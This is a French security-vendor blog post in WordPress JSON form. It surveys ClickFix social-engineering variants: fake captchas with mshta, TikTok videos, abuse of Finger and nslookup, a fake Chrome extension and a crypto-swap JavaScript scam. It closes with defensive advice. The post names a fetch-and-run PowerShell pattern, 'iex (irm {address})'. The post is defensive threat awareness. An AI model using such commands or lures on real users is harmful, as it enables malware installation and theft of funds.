{"id":23706,"date":"2026-03-13T09:57:05","date_gmt":"2026-03-13T07:57:05","guid":{"rendered":"https:\/\/www.kaspersky.fr\/blog\/?p=23706"},"modified":"2026-03-13T14:02:46","modified_gmt":"2026-03-13T12:02:46","slug":"clickfix-attack-variations","status":"publish","type":"post","link":"https:\/\/www.kaspersky.fr\/blog\/clickfix-attack-variations\/23706\/","title":{"rendered":"Variantes de la technique ClickFix"},"content":{"rendered":"<p>Il y a environ un an, nous avons publi\u00e9 un <a href=\"https:\/\/www.kaspersky.com\/blog\/what-is-clickfix\/53348\/\" target=\"_blank\" rel=\"noopener nofollow\">article<\/a> sur la technique ClickFix, qui devenait de plus en plus populaire parmi les cybercriminels. Le principe des attaques utilisant la technique ClickFix consiste \u00e0 convaincre la victime, sous divers pr\u00e9textes, d\u2019ex\u00e9cuter une commande malveillante sur son ordinateur. Autrement dit, du point de vue des solutions de cybers\u00e9curit\u00e9, la commande est ex\u00e9cut\u00e9 au nom de l\u2019utilisateur concern\u00e9 et avec ses privil\u00e8ges.<\/p>\n<p>Lors des premi\u00e8res utilisations de cette technique, les cybercriminels tentaient de convaincre les victimes qu\u2019elles devaient ex\u00e9cuter une commande pour r\u00e9soudre un probl\u00e8me ou <a href=\"https:\/\/www.kaspersky.com\/blog\/interlock-ransomware-clickfix-attack\/53414\/\" target=\"_blank\" rel=\"noopener nofollow\">un captcha<\/a>, et dans la grande majorit\u00e9 des cas, la commande malveillante \u00e9tait un script PowerShell. Cependant, depuis lors, les pirates informatiques ont trouv\u00e9 une s\u00e9rie de nouvelles ruses, que les utilisateurs devraient conna\u00eetre, ainsi qu\u2019un certain nombre de nouvelles variantes de diffusion de charges utiles malveillantes, qui m\u00e9ritent \u00e9galement d\u2019\u00eatre surveill\u00e9es.<\/p>\n<h2>Utilisation de l\u2019utilitaire <em>mshta.exe<\/em><\/h2>\n<p>L\u2019ann\u00e9e derni\u00e8re, les experts de Microsoft ont publi\u00e9 un <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2025\/03\/13\/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware\/\" target=\"_blank\" rel=\"noopener nofollow\">rapport<\/a> sur les cyberattaques visant les propri\u00e9taires d\u2019h\u00f4tels collaborant avec la plateforme Booking.com. Les cybercriminels ont envoy\u00e9 de fausses notifications de la part du service, ou des emails pr\u00e9tendant provenir d\u2019invit\u00e9s attirant l\u2019attention sur une \u00e9valuation. Dans les deux cas, l\u2019email contenait un lien vers une page imitant le site Booking.com, qui demandait \u00e0 la victime de prouver qu\u2019elle n\u2019\u00e9tait pas un robot en ex\u00e9cutant un code via le menu Ex\u00e9cuter.<\/p>\n<p>Il existe deux diff\u00e9rences essentielles entre cette attaque et la technique ClickFix. La premi\u00e8re consiste \u00e0 ne pas demander \u00e0 l\u2019utilisateur de copier la cha\u00eene (apr\u00e8s tout, une cha\u00eene contenant du code \u00e9veille parfois des soup\u00e7ons). Cette-ci est copi\u00e9e dans la m\u00e9moire tampon d\u2019\u00e9change par le site malveillant, g\u00e9n\u00e9ralement lorsque l\u2019utilisateur clique sur une case \u00e0 cocher qui imite le m\u00e9canisme reCAPTCHA. La seconde consiste \u00e0 ce que la cha\u00eene malveillante appelle l\u2019utilitaire l\u00e9gitime <em>mshta.exe<\/em>, qui permet d\u2019ex\u00e9cuter des applications \u00e9crites en HTML. Elle contacte le serveur des cybercriminels et ex\u00e9cute la charge utile malveillante.<\/p>\n<h2>Vid\u00e9o sur TikTok et PowerShell avec des privil\u00e8ges d\u2019administrateur<\/h2>\n<p>En octobre\u00a02025, le site BleepingComputer a publi\u00e9 un <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/tiktok-videos-continue-to-push-infostealers-in-clickfix-attacks\/\" target=\"_blank\" rel=\"noopener nofollow\">article<\/a> au sujet d\u2019une campagne visant \u00e0 diffuser des programmes malveillants au moyen d\u2019instructions dans des vid\u00e9os TikTok. Les vid\u00e9os elles-m\u00eames imitent des tutoriels vid\u00e9o indiquant comment activer gratuitement des logiciels propri\u00e9taires. Le conseil qu\u2019elles donnent se r\u00e9sume \u00e0 la n\u00e9cessit\u00e9 de lancer PowerShell avec des privil\u00e8ges d\u2019administrateur, puis d\u2019ex\u00e9cuter la commande <em>iex (irm {address})<\/em>. Ici, la commande irm t\u00e9l\u00e9charge un script malveillant \u00e0 partir d\u2019un serveur contr\u00f4l\u00e9 par les pirates informatiques, et la commande <em>iex<\/em> (Invoke-Expression) l\u2019ex\u00e9cute. Le script, \u00e0 son tour, t\u00e9l\u00e9charge un programme malveillant voleur d\u2019informations sur l\u2019ordinateur de la victime.<\/p>\n<h2>Utilisation du protocole Finger<\/h2>\n<p>Une autre variante inhabituelle de l\u2019attaque ClickFix <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/decades-old-finger-protocol-abused-in-clickfix-malware-attacks\/\" target=\"_blank\" rel=\"noopener nofollow\">reprend<\/a> la m\u00eame technique de captcha, mais le script malveillant utilise le protocole <a href=\"https:\/\/fr.wikipedia.org\/wiki\/Finger_(Unix)\" target=\"_blank\" rel=\"noopener nofollow\">Finger<\/a>, devenu obsol\u00e8te. L\u2019utilitaire du m\u00eame nom permet \u00e0 n\u2019importe qui de demander des donn\u00e9es au sujet d\u2019un utilisateur particulier sur un serveur distant. Le protocole est rarement utilis\u00e9 de nos jours, mais il continue d\u2019\u00eatre pris en charge par Windows, macOS et un certain nombre de syst\u00e8mes bas\u00e9s sur Linux.<\/p>\n<p>L\u2019utilisateur est encourag\u00e9 \u00e0 ouvrir l\u2019interface de ligne de commande et \u00e0 y ex\u00e9cuter une commande qui \u00e9tablit une connexion via le protocole Finger (en utilisant le port TCP\u00a079) avec le serveur des pirates informatiques. Le protocole transf\u00e8re uniquement des informations textuelles, mais cette op\u00e9ration suffit pour t\u00e9l\u00e9charger un autre script sur l\u2019ordinateur de la victime, qui installe alors le programme malveillant.<\/p>\n<h2>Variante de la technique CrashFix<\/h2>\n<p>Une autre variante de la technique ClickFix se distingue par l\u2019utilisation d\u2019une ing\u00e9nierie sociale plus \u00e9labor\u00e9e. Cette m\u00e9thode <a href=\"https:\/\/thehackernews.com\/2026\/01\/crashfix-chrome-extension-delivers.html\" target=\"_blank\" rel=\"noopener nofollow\">a \u00e9t\u00e9 utilis\u00e9e dans le cadre d\u2019une attaque<\/a> contre des utilisateurs qui tentaient de trouver un outil permettant de bloquer les banni\u00e8res publicitaires, les traqueurs, les programmes malveillants et d\u2019autres contenus ind\u00e9sirables sur les pages Internet. Alors qu\u2019elles cherchaient une extension appropri\u00e9e pour Google Chrome, les victimes ont trouv\u00e9 un module appel\u00e9 <em>NexShield \u2013 Advanced Web Guardian<\/em>, qui \u00e9tait en fait un clone d\u2019un v\u00e9ritable logiciel fonctionnel, mais qui, \u00e0 un certain moment, faisait planter le navigateur et affichait une fausse notification concernant un probl\u00e8me de s\u00e9curit\u00e9 d\u00e9tect\u00e9 et la n\u00e9cessit\u00e9 d\u2019ex\u00e9cuter une \u00ab\u00a0analyse\u00a0\u00bb pour corriger l\u2019erreur. Si l\u2019utilisateur acceptait, il recevait des instructions sur la marche \u00e0 suivre pour ouvrir le menu Ex\u00e9cuter et lancer une commande que l\u2019extension avait pr\u00e9alablement copi\u00e9e dans le presse-papiers.<\/p>\n<p>La commande copiait le fichier connu <em>finger.exe<\/em> dans un r\u00e9pertoire temporaire, le renommait en \u00ab\u00a0<em>ct.exe\u00a0\u00bb<\/em>, puis le lan\u00e7ait avec l\u2019adresse du pirate. Le reste de l\u2019attaque se d\u00e9roulait de la m\u00eame mani\u00e8re que dans le cas susmentionn\u00e9. En r\u00e9ponse \u00e0 la demande du protocole Finger, un script malveillant \u00e9tait d\u00e9ploy\u00e9, qui lan\u00e7ait et installait un cheval de Troie d\u2019acc\u00e8s \u00e0 distance (dans ce cas, ModeloRAT).<\/p>\n<h2>Diffusion de programmes malveillants via une recherche DNS<\/h2>\n<p>L\u2019\u00e9quipe Microsoft Threat Intelligence a \u00e9galement <a href=\"https:\/\/thehackernews.com\/2026\/02\/microsoft-discloses-dns-based-clickfix.html\" target=\"_blank\" rel=\"noopener nofollow\">partag\u00e9<\/a> une variante d\u2019attaque ClickFix l\u00e9g\u00e8rement plus complexe que d\u2019habitude. Malheureusement, ils n\u2019ont pas d\u00e9crit la technique d\u2019ing\u00e9nierie sociale, mais la m\u00e9thode de diffusion de la charge utile malveillante est plut\u00f4t int\u00e9ressante. Il est probable que, pour compliquer la d\u00e9tection de l\u2019attaque dans un environnement d\u2019entreprise et prolonger la dur\u00e9e de vie de l\u2019infrastructure malveillante, les auteurs de l\u2019attaque ont ajout\u00e9 une \u00e9tape suppl\u00e9mentaire\u00a0: contacter un serveur DNS qu\u2019ils contr\u00f4laient.<\/p>\n<p>Autrement dit, apr\u00e8s que la victime a \u00e9t\u00e9 persuad\u00e9e de copier et d\u2019ex\u00e9cuter une commande malveillante, une demande est envoy\u00e9e au serveur DNS au nom de l\u2019utilisateur par l\u2019interm\u00e9diaire de l\u2019utilitaire l\u00e9gitime <em>nslookup<\/em>, afin d\u2019obtenir des donn\u00e9es se rapportant au domaine <em>exemple.com<\/em>. La commande contenait l\u2019adresse d\u2019un serveur DNS contr\u00f4l\u00e9 par les cybercriminels. Elle renvoyait une r\u00e9ponse qui, entre autres, contenait une cha\u00eene de caract\u00e8res avec un script malveillant, qui \u00e0 son tour t\u00e9l\u00e9chargeait la charge utile finale (dans cette attaque, le programme malveillant ModeloRAT encore une fois).<\/p>\n<h2>App\u00e2t en cryptomonnaies et JavaScript en tant que charge utile<\/h2>\n<p>La <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/pastebin-comments-push-clickfix-javascript-attack-to-hijack-crypto-swaps\/\" target=\"_blank\" rel=\"noopener nofollow\">variante d\u2019attaque<\/a> suivante est int\u00e9ressante en raison de son ing\u00e9nierie sociale en plusieurs \u00e9tapes. Dans des commentaires sur Pastebin, des cybercriminels ont activement relay\u00e9 un message concernant une pr\u00e9tendue faille dans le service d\u2019\u00e9change de cryptomonnaies <em>Swapzone.io<\/em>. Les propri\u00e9taires de cryptomonnaies \u00e9taient invit\u00e9s \u00e0 se rendre sur une ressource cr\u00e9\u00e9e par les escrocs, qui contenait des instructions pr\u00e9cises sur la fa\u00e7on d\u2019exploiter cette faille, qui permettait de rapporter jusqu\u2019\u00e0 13\u00a0000\u00a0dollars en quelques jours.<\/p>\n<p>Les instructions d\u00e9crivent comment les failles du service peuvent \u00eatre exploit\u00e9es pour \u00e9changer des cryptomonnaies \u00e0 un taux plus avantageux. Pour ce faire, une victime doit ouvrir le site Internet du service dans le navigateur Chrome, taper manuellement \u00ab\u00a0javascript:\u00a0\u00bb dans la barre d\u2019adresse, puis coller le script JavaScript copi\u00e9 sur le site des pirates et l\u2019ex\u00e9cuter. En r\u00e9alit\u00e9, il va de soi que le script ne peut en aucun cas influencer les taux de change. Il se contente de remplacer les adresses des portefeuilles Bitcoin et, si la victime tente bel et bien d\u2019\u00e9changer quelque chose, de transf\u00e9rer les fonds sur les comptes des escrocs.<\/p>\n<h2>Comment prot\u00e9ger votre entreprise contre les attaques ClickFix\u00a0?<\/h2>\n<p>Les attaques les plus simples utilisant la technique ClickFix peuvent \u00eatre contr\u00e9es en bloquant la combinaison de touches <strong>[Win]<\/strong> + <strong>[R]<\/strong> sur les appareils de travail. Toutefois, comme le montrent les exemples cit\u00e9s, c\u2019est loin d\u2019\u00eatre le seul type d\u2019attaque dans lequel les utilisateurs sont invit\u00e9s \u00e0 ex\u00e9cuter eux-m\u00eames du code malveillant.<\/p>\n<p>Le principal conseil est donc de sensibiliser les employ\u00e9s \u00e0 la cybers\u00e9curit\u00e9. Ils doivent clairement comprendre que, si quelqu\u2019un leur demande d\u2019effectuer des manipulations inhabituelles avec le syst\u00e8me, et\/ou de copier et coller du code quelque part, il s\u2019agit dans la plupart des cas d\u2019une ruse utilis\u00e9e par les cybercriminels. Il est possible d\u2019organiser une formation de sensibilisation \u00e0 la s\u00e9curit\u00e9 \u00e0 l\u2019aide de la plateforme <a href=\"https:\/\/k-asap.com\/fr\/?icid=fr_kdailyplacehold_acq_ona_smm__onl_b2b_kasperskydaily_wpplaceholder____kasap___\" target=\"_blank\" rel=\"noopener\">Kaspersky Automated Security Awareness Platform<\/a>.<\/p>\n<p>En outre, pour se prot\u00e9ger contre de telles cyberattaques, nous recommandons\u00a0:<\/p>\n<ul>\n<li>d\u2019utiliser une <a href=\"https:\/\/www.kaspersky.fr\/next?icid=fr_kdailyplacehold_acq_ona_smm__onl_b2b_kdaily_prodmen_sm-team___knext___\" target=\"_blank\" rel=\"noopener\">protection fiable<\/a> sur tous les appareils de l\u2019entreprise ;<\/li>\n<li>de surveiller les activit\u00e9s suspectes sur le r\u00e9seau de l\u2019entreprise \u00e0 l\u2019aide d\u2019une <a href=\"https:\/\/www.kaspersky.fr\/next?icid=fr_kdailyplacehold_acq_ona_smm__onl_b2b_kdaily_prodmen_sm-team___knext___\" target=\"_blank\" rel=\"noopener\">solution XDR<\/a>;<\/li>\n<\/ul>\n<ul>\n<li>si les ressources internes sont insuffisantes, de faire appel \u00e0 un <a href=\"https:\/\/www.kaspersky.fr\/enterprise-security\/incident-response?icid=fr_kdailyplacehold_acq_ona_smm__onl_b2b_kasperskydaily_wpplaceholder_______\" target=\"_blank\" rel=\"noopener\">service externe pour d\u00e9tecter les menaces et y r\u00e9pondre rapidement<\/a>.<\/li>\n<\/ul>\n<input type=\"hidden\" class=\"category_for_banner\" value=\"kasap\">\n","protected":false},"excerpt":{"rendered":"<p>Diff\u00e9rents exemples de la technique ClickFix utilis\u00e9e dans des attaques r\u00e9elles.<\/p>\n","protected":false},"author":2706,"featured_media":23708,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[2112,3150,3151],"tags":[4546,42,533],"class_list":{"0":"post-23706","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-business","8":"category-enterprise","9":"category-smb","10":"tag-clickfix","11":"tag-fraude","12":"tag-ingenierie-sociale"},"hreflang":[{"hreflang":"fr","url":"https:\/\/www.kaspersky.fr\/blog\/clickfix-attack-variations\/23706\/"},{"hreflang":"en-in","url":"https:\/\/www.kaspersky.co.in\/blog\/clickfix-attack-variations\/30230\/"},{"hreflang":"en-ae","url":"https:\/\/me-en.kaspersky.com\/blog\/clickfix-attack-variations\/25307\/"},{"hreflang":"ar","url":"https:\/\/me.kaspersky.com\/blog\/clickfix-attack-variations\/13270\/"},{"hreflang":"en-gb","url":"https:\/\/www.kaspersky.co.uk\/blog\/clickfix-attack-variations\/30102\/"},{"hreflang":"es","url":"https:\/\/www.kaspersky.es\/blog\/clickfix-attack-variations\/31917\/"},{"hreflang":"it","url":"https:\/\/www.kaspersky.it\/blog\/clickfix-attack-variations\/30523\/"},{"hreflang":"ru","url":"https:\/\/www.kaspersky.ru\/blog\/clickfix-attack-variations\/41374\/"},{"hreflang":"tr","url":"https:\/\/www.kaspersky.com.tr\/blog\/clickfix-attack-variations\/14359\/"},{"hreflang":"x-default","url":"https:\/\/www.kaspersky.com\/blog\/clickfix-attack-variations\/55340\/"},{"hreflang":"pt-br","url":"https:\/\/www.kaspersky.com.br\/blog\/clickfix-attack-variations\/24806\/"},{"hreflang":"de","url":"https:\/\/www.kaspersky.de\/blog\/clickfix-attack-variations\/33269\/"},{"hreflang":"ru-kz","url":"https:\/\/blog.kaspersky.kz\/clickfix-attack-variations\/30337\/"},{"hreflang":"en-au","url":"https:\/\/www.kaspersky.com.au\/blog\/clickfix-attack-variations\/35986\/"},{"hreflang":"en-za","url":"https:\/\/www.kaspersky.co.za\/blog\/clickfix-attack-variations\/35643\/"}],"acf":[],"banners":"","maintag":{"url":"https:\/\/www.kaspersky.fr\/blog\/tag\/ingenierie-sociale\/","name":"ing\u00e9nierie sociale"},"_links":{"self":[{"href":"https:\/\/www.kaspersky.fr\/blog\/wp-json\/wp\/v2\/posts\/23706","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.kaspersky.fr\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kaspersky.fr\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kaspersky.fr\/blog\/wp-json\/wp\/v2\/users\/2706"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kaspersky.fr\/blog\/wp-json\/wp\/v2\/comments?post=23706"}],"version-history":[{"count":6,"href":"https:\/\/www.kaspersky.fr\/blog\/wp-json\/wp\/v2\/posts\/23706\/revisions"}],"predecessor-version":[{"id":23713,"href":"https:\/\/www.kaspersky.fr\/blog\/wp-json\/wp\/v2\/posts\/23706\/revisions\/23713"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.kaspersky.fr\/blog\/wp-json\/wp\/v2\/media\/23708"}],"wp:attachment":[{"href":"https:\/\/www.kaspersky.fr\/blog\/wp-json\/wp\/v2\/media?parent=23706"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kaspersky.fr\/blog\/wp-json\/wp\/v2\/categories?post=23706"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kaspersky.fr\/blog\/wp-json\/wp\/v2\/tags?post=23706"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}